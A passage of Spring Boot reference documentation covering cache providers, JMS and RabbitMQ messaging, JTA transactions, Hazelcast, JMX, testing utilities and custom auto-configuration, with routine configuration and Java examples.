it.\n\n\n\n[[boot-features-caching-provider-ehcache2]]\n==== EhCache 2.x\nEhCache 2.x is used if a file named `ehcache.xml` can be found at the root of the\nclasspath. If EhCache 2.x and such file is present it is used to bootstrap the cache\nmanager. An alternate configuration file can be provide a well using:\n\n[source,properties,indent=0]\n----\n\tspring.cache.ehcache.config=classpath:config\/another-config.xml\n----\n\n\n\n[[boot-features-caching-provider-hazelcast]]\n==== Hazelcast\n\nSpring Boot has a <<boot-features-hazelcast,general support for Hazelcast>>. If\na `HazelcastInstance` has been auto-configured, it is automatically wrapped in a\n`CacheManager`.\n\nIf for some reason you need a different `HazelcastInstance` for caching, you can\nrequest Spring Boot to create a separate one that will be only used by the\n`CacheManager`:\n\n[source,properties,indent=0]\n----\n\tspring.cache.hazelcast.config=classpath:config\/my-cache-hazelcast.xml\n----\n\nTIP: If a separate `HazelcastInstance` is created that way, it is not registered\nin the application context.\n\n\n\n[[boot-features-caching-provider-infinispan]]\n==== Infinispan\nInfinispan has no default configuration file location so it must be specified explicitly\n(or the default bootstrap is used).\n\n[source,properties,indent=0]\n----\n\tspring.cache.infinispan.config=infinispan.xml\n----\n\nCaches can be created on startup via the `spring.cache.cache-names` property. If a custom\n`ConfigurationBuilder` bean is defined, it is used to customize them.\n\n\n\n[[boot-features-caching-provider-redis]]\n==== Redis\nIf Redis is available and configured, the `RedisCacheManager` is auto-configured. It is\nalso possible to create additional caches on startup using the `spring.cache.cache-names`\nproperty.\n\n\n\n[[boot-features-caching-provider-guava]]\n==== Guava\nIf Guava is present, a `GuavaCacheManager` is auto-configured. Caches can be created\non startup using the `spring.cache.cache-names` property and customized by one of the\nfollowing (in this order):\n\n1. A cache spec defined by `spring.cache.guava.spec`\n2. A `com.google.common.cache.CacheBuilderSpec` bean is defined\n3. A `com.google.common.cache.CacheBuilder` bean is defined\n\nFor instance, the following configuration creates a `foo` and `bar` caches with a maximum\nsize of 500 and a _time to live_ of 10 minutes\n\n[source,properties,indent=0]\n----\n spring.cache.cache-names=foo,bar\n\tspring.cache.guava.spec=maximumSize=500,expireAfterAccess=600s\n----\n\nBesides, if a `com.google.common.cache.CacheLoader` bean is defined, it is automatically\nassociated to the `GuavaCacheManager`.\n\n\n\n[[boot-features-caching-provider-simple]]\n==== Simple\nIf none of these options worked out, a simple implementation using `ConcurrentHashMap`\nas cache store is configured. This is the default if no caching library is present in\nyour application.\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n'`Advanced Message Queuing Protocol`' and Spring Boot also provides auto-configuration\noptions for `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging\nnatively in Spring WebSocket and Spring Boot has support for that through starters and a\nsmall amount of auto-configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details). Spring Boot also auto-configures the necessary infrastructure\nto send and receive messages.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`+spring.activemq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee\n{sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-artemis]]\n==== Artemis support\nApache Artemis was formed in 2015 when HornetQ was donated to the Apache Foundation. All\nthe features listed in the <<boot-features-hornetq>> section below can be applied to\nArtemis. Simply replace `+++spring.hornetq.*+++` properties with `+++spring.artemis.*+++`\nand use `spring-boot-starter-artemis` instead of `spring-boot-starter-hornetq`.\n\nNOTE: You should not try and use Artemis and HornetQ and the same time.\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to connect\nto a broker using the `netty` transport protocol. When the latter is configured, Spring\nBoot configures a `ConnectionFactory` connecting to a broker running on the local machine\nwith the default settings.\n\nNOTE: If you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`+spring.hornetq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can choose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma-separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee\n{sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the '`name`' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-jms-jndi]]\n==== Using a JNDI ConnectionFactory\nIf you are running your application in an Application Server Spring Boot will attempt to\nlocate a JMS `ConnectionFactory` using JNDI. By default the locations `java:\/JmsXA` and\n`java:\/XAConnectionFactory` will be checked. You can use the\n`spring.jms.jndi-name` property if you need to specify an alternative location:\n\n[source,properties,indent=0]\n----\n\tspring.jms.jndi-name=java:\/MyConnectionFactory\n----\n\n\n\n[[boot-features-using-jms-sending]]\n==== Sending a message\nSpring's `JmsTemplate` is auto-configured and you can autowire it directly into your own\nbeans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-javadoc}\/jms\/core\/JmsMessagingTemplate.{dc-ext}[`JmsMessagingTemplate`]\ncan be injected in a similar manner.\n\n\n\n[[boot-features-using-jms-receiving]]\n==== Receiving a message\n\nWhen the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to\ncreate a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a\ndefault one is configured automatically.\n\nThe default factory is transactional by default. If you are running in an infrastructure\nwhere a `JtaTransactionManager` is present, it will be associated to the listener container\nby default. If not, the `sessionTransacted` flag will be enabled. In that latter scenario,\nyou can associate your local data store transaction to the processing of an incoming message\nby adding `@Transactional` on your listener method (or a delegate thereof). This will make\nsure that the incoming message is acknowledged once the local transaction has completed. This\nalso includes sending response messages that have been performed on the same JMS session.\n\nThe following component creates a listener endpoint on the `someQueue` destination:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@JmsListener(destination = \"someQueue\")\n\t\tpublic void processMessage(String content) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nTIP: Check {spring-javadoc}\/jms\/annotation\/EnableJms.{dc-ext}[the Javadoc of `@EnableJms`] for\nmore details.\n\n\n\n[[boot-features-amqp]]\n=== AMQP\nThe Advanced Message Queuing Protocol (AMQP) is a platform-neutral, wire-level protocol\nfor message-oriented middleware. The Spring AMQP project applies core Spring concepts to\nthe development of AMQP-based messaging solutions.\n\n\n\n[[boot-features-rabbitmq]]\n==== RabbitMQ support\nRabbitMQ is a lightweight, reliable, scalable and portable message broker based on the\nAMQP protocol. Spring uses `RabbitMQ` to communicate using the AMQP protocol.\n\nRabbitMQ configuration is controlled by external configuration properties in\n`+spring.rabbitmq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.rabbitmq.host=localhost\n\tspring.rabbitmq.port=5672\n\tspring.rabbitmq.username=admin\n\tspring.rabbitmq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[`RabbitProperties`]\nfor more of the supported options.\n\nTIP: Check http:\/\/spring.io\/blog\/2010\/06\/14\/understanding-amqp-the-protocol-used-by-rabbitmq\/[Understanding AMQP, the protocol used by RabbitMQ]\nfor more details.\n\n\n\n[[boot-features-using-amqp-sending]]\n==== Sending a message\nSpring's `AmqpTemplate` and `AmqpAdmin` are auto-configured and you can autowire them\ndirectly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.amqp.core.AmqpAdmin;\n\timport org.springframework.amqp.core.AmqpTemplate;\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final AmqpAdmin amqpAdmin;\n\t\tprivate final AmqpTemplate amqpTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(AmqpAdmin amqpAdmin, AmqpTemplate amqpTemplate) {\n\t\t\tthis.amqpAdmin = amqpAdmin;\n\t\t\tthis.amqpTemplate = amqpTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-amqp-javadoc}\/rabbit\/core\/RabbitMessagingTemplate.{dc-ext}[`RabbitMessagingTemplate`]\ncan be injected in a similar manner.\n\nAny `org.springframework.amqp.core.Queue` that is defined as a bean will be automatically\nused to declare a corresponding queue on the RabbitMQ instance if necessary.\n\n\n\n[[boot-features-using-amqp-receiving]]\n==== Receiving a message\nWhen the Rabbit infrastructure is present, any bean can be annotated with\n`@RabbitListener` to create a listener endpoint. If no `RabbitListenerContainerFactory`\nhas been defined, a default one is configured automatically.\n\nThe following component creates a listener endpoint on the `someQueue` queue:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@RabbitListener(queues = \"someQueue\")\n\t\tpublic void processMessage(String content) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nTIP: Check {spring-amqp-javadoc}\/rabbit\/annotation\/EnableRabbit.{dc-ext}[the Javadoc of `@EnableRabbit`]\nfor more details.\n\n\n\n[[boot-features-email]]\n== Sending email\nThe Spring Framework provides an easy abstraction for sending email using the\n`JavaMailSender` interface and Spring Boot provides auto-configuration for it as well as\na starter module.\n\nTIP: Check the {spring-reference}\/#mail[reference documentation] for a detailed\nexplanation of how you can use `JavaMailSender`.\n\nIf `spring.mail.host` and the relevant libraries (as defined by\n`spring-boot-starter-mail`) are available, a default `JavaMailSender` is created if none\nexists. The sender can be further customized by configuration items from the `spring.mail`\nnamespace, see the\n{sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[`MailProperties`] for more\ndetails.\n\n\n\n[[boot-features-jta]]\n== Distributed Transactions with JTA\nSpring Boot supports distributed JTA transactions across multiple XA resources using\neither an http:\/\/www.atomikos.com\/[Atomikos] or https:\/\/github.com\/bitronix\/btm[Bitronix]\nembedded transaction manager. JTA transactions are also supported when deploying to a\nsuitable Java EE Application Server.\n\nWhen a JTA environment is detected, Spring's `JtaTransactionManager` will be used to\nmanage transactions. Auto-configured JMS, DataSource and JPA beans will be upgraded to\nsupport XA transactions. You can use standard Spring idioms such as `@Transactional` to\nparticipate in a distributed transaction. If you are within a JTA environment and still\nwant to use local transactions you can set the `spring.jta.enabled` property to `false` to\ndisable the JTA auto-configuration.\n\n\n\n=== Using an Atomikos transaction manager\nAtomikos is a popular open source transaction manager which can be embedded into your\nSpring Boot application. You can use the `spring-boot-starter-jta-atomikos` Starter POM to\npull in the appropriate Atomikos libraries. Spring Boot will auto-configure Atomikos and\nensure that appropriate `depends-on` settings are applied to your Spring beans for correct\nstartup and shutdown ordering.\n\nBy default Atomikos transaction logs will be written to a `transaction-logs` directory in\nyour application home directory (the directory in which your application jar file\nresides). You can customize this directory by setting a `spring.jta.log-dir` property in\nyour `application.properties` file. Properties starting `spring.jta.` can also be used to\ncustomize the Atomikos `UserTransactionServiceImp`. See the\n{dc-spring-boot}\/jta\/atomikos\/AtomikosProperties.{dc-ext}[`AtomikosProperties` Javadoc]\nfor complete details.\n\nNOTE: To ensure that multiple transaction managers can safely coordinate the same\nresource managers, each Atomikos instance must be configured with a unique ID. By default\nthis ID is the IP address of the machine on which Atomikos is running. To ensure\nuniqueness in production, you should configure the `spring.jta.transaction-manager-id`\nproperty with a different value for each instance of your application.\n\n\n\n=== Using a Bitronix transaction manager\nBitronix is another popular open source JTA transaction manager implementation. You can\nuse the `spring-boot-starter-jta-bitronix` starter POM to add the appropriate Bitronix\ndependencies to your project. As with Atomikos, Spring Boot will automatically configure\nBitronix and post-process your beans to ensure that startup and shutdown ordering is\ncorrect.\n\nBy default Bitronix transaction log files (`part1.btm` and `part2.btm`) will be written to\na `transaction-logs` directory in your application home directory. You can customize this\ndirectory by using the `spring.jta.log-dir` property. Properties starting `spring.jta.`\nare also bound to the `bitronix.tm.Configuration` bean, allowing for complete\ncustomization. See the\nhttps:\/\/github.com\/bitronix\/btm\/wiki\/Transaction-manager-configuration[Bitronix documentation]\nfor details.\n\nNOTE: To ensure that multiple transaction managers can safely coordinate the same\nresource managers, each Bitronix instance must be configured with a unique ID. By default\nthis ID is the IP address of the machine on which Bitronix is running. To ensure\nuniqueness in production, you should configure the `spring.jta.transaction-manager-id`\nproperty with a different value for each instance of your application.\n\n\n\n=== Using a Java EE managed transaction manager\nIf you are packaging your Spring Boot application as a `war` or `ear` file and deploying\nit to a Java EE application server, you can use your application servers built-in\ntransaction manager. Spring Boot will attempt to auto-configure a transaction manager by\nlooking at common JNDI locations (`java:comp\/UserTransaction`,\n`java:comp\/TransactionManager` etc). If you are using a transaction service provided by\nyour application server, you will generally also want to ensure that all resources are\nmanaged by the server and exposed over JNDI. Spring Boot will attempt to auto-configure\nJMS by looking for a `ConnectionFactory` at the JNDI path `java:\/JmsXA` or\n`java:\/XAConnectionFactory` and you can use the\n<<boot-features-connecting-to-a-jndi-datasource, `spring.datasource.jndi-name` property>>\nto configure your `DataSource`.\n\n\n\n=== Mixing XA and non-XA JMS connections\nWhen using JTA, the primary JMS `ConnectionFactory` bean will be XA aware and participate\nin distributed transactions. In some situations you might want to process certain JMS\nmessages using a non-XA `ConnectionFactory`. For example, your JMS processing logic might\ntake longer than the XA timeout.\n\nIf you want to use a non-XA `ConnectionFactory` you can inject the\n`nonXaJmsConnectionFactory` bean rather than the `@Primary` `jmsConnectionFactory` bean.\nFor consistency the `jmsConnectionFactory` bean is also provided using the bean alias\n`xaJmsConnectionFactory`.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ Inject the primary (XA aware) ConnectionFactory\n\t@Autowired\n\tprivate ConnectionFactory defaultConnectionFactory;\n\n\t\/\/ Inject the XA aware ConnectionFactory (uses the alias and injects the same as above)\n\t@Autowired\n\t@Qualifier(\"xaJmsConnectionFactory\")\n\tprivate ConnectionFactory xaConnectionFactory;\n\n\t\/\/ Inject the non-XA aware ConnectionFactory\n\t@Autowired\n\t@Qualifier(\"nonXaJmsConnectionFactory\")\n\tprivate ConnectionFactory nonXaConnectionFactory;\n----\n\n\n\n=== Supporting an alternative embedded transaction manager\nThe {sc-spring-boot}\/jta\/XAConnectionFactoryWrapper.{sc-ext}[`XAConnectionFactoryWrapper`]\nand {sc-spring-boot}\/jta\/XADataSourceWrapper.{sc-ext}[`XADataSourceWrapper`] interfaces\ncan be used to support alternative embedded transaction managers. The interfaces are\nresponsible for wrapping `XAConnectionFactory` and `XADataSource` beans and exposing them\nas regular `ConnectionFactory` and `DataSource` beans which will transparently enroll in\nthe distributed transaction. DataSource and JMS auto-configuration will use JTA variants\nas long as you have a `JtaTransactionManager` bean and appropriate XA wrapper beans\nregistered within your `ApplicationContext`.\n\nThe {sc-spring-boot}\/jta\/BitronixXAConnectionFactoryWrapper.{sc-ext}[BitronixXAConnectionFactoryWrapper]\nand {sc-spring-boot}\/jta\/BitronixXADataSourceWrapper.{sc-ext}[BitronixXADataSourceWrapper]\nprovide good examples of how to write XA wrappers.\n\n\n\n[[boot-features-hazelcast]]\n== Hazelcast\n\nIf hazelcast is on the classpath, Spring Boot will auto-configure an `HazelcastInstance`\nthat you can inject in your application. The `HazelcastInstance` is only created if a\nconfiguration is found.\n\nYou can define a `com.hazelcast.config.Config` bean and we'll use that. If your\nconfiguration defines an instance name, we'll try to locate an existing instance rather\nthan creating a new one.\n\nYou could also specify the `hazelcast.xml` configuration file to use via configuration:\n\n[source,properties,indent=0]\n----\n\tspring.hazelcast.config=classpath:config\/my-hazelcast.xml\n----\n\nOtherwise, Spring Boot tries to find the Hazelcast configuration from the default\nlocations, that is `hazelcast.xml` in the working directory or at the root of the\nclasspath. We also check if the `hazelcast.config` system property is set. Check the\nhttp:\/\/docs.hazelcast.org\/docs\/latest\/manual\/html-single\/[Hazelcast documentation] for\nmore details.\n\nNOTE: Spring Boot also has an\n<<boot-features-caching-provider-hazelcast,explicit caching support for Hazelcast>>. The\n`HazelcastInstance` is automatically wrapped in a `CacheManager` implementation if\ncaching is enabled.\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if `'spring-integration-jmx'` is also on the classpath. See the\n{sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-session]]\n== Spring Session\nSpring Session provides support for managing a user's session information. If you are\nwriting a web application and Spring Session and Spring Data Redis are both on the\nclasspath, Spring Boot will auto-configure Spring Session through its\n`@EnableRedisHttpSession`. Session data will be stored in Redis and the session timeout\ncan be configured using the `server.session-timeout` property.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n'`mbeanServer`' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the\n{sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module under\nthe `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` '`Starter POM`' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* JUnit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond '`unit testing`' and start '`integration testing`' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` '`Starter POM`' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebIntegrationTest` or `@WebAppConfiguration`\nannotations. (`MockMVC` and `@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@WebIntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(SampleDataJpaApplication.class)\n\t@WebIntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@WebIntegrationTest` as colon-\nor equals-separated name-value pairs, e.g. `@WebIntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(MyApplication.class)\n\t@WebIntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nNOTE: The annotations <<boot-features-testing-spring-boot-applications,described above>>\ncan be used with Spock, i.e. you can annotate your `Specification` with\n`@WebIntegrationTest` to suit the needs of your tests.\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is useful in\nintegration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response location),\nignoring cookies (so the template is stateless), and not throwing exceptions on\nserver-side errors. It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Creating your own auto-configuration\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked-up by\nSpring Boot.\n\nAuto-configuration can be associated to a \"starter\" that provides the auto-configuration\ncode as well as the typical libraries that you would use with it. We will first cover what\nyou need to know to build your own auto-configuration and we will move on to the\n<<boot-features-custom-starter,typical steps required to create a custom starter>>.\n\nTIP: A https:\/\/github.com\/snicoll-demos\/spring-boot-master-auto-configuration[demo project]\nis available to showcase how you can create a starter step by step.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only applies\nwhen relevant classes are found and when you have not declared your own `@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example, if\nyou provide web-specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Conditional` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to '`override`' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allows\nconfiguration to be included based on the presence or absence of specific classes. Due to\nthe fact that annotation metadata is parsed using http:\/\/asm.ow2.org\/[ASM] you can\nactually use the `value` attribute to refer to the real class, even though that class\nmight not actually appear on the running application classpath. You can also use the\n`name` attribute if you prefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow a bean\nto be included based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nTIP: You need to be very careful about the order that bean definitions are added as these\nconditions are evaluated based on what has been processed so far. For this reason,\nwe recommend only using 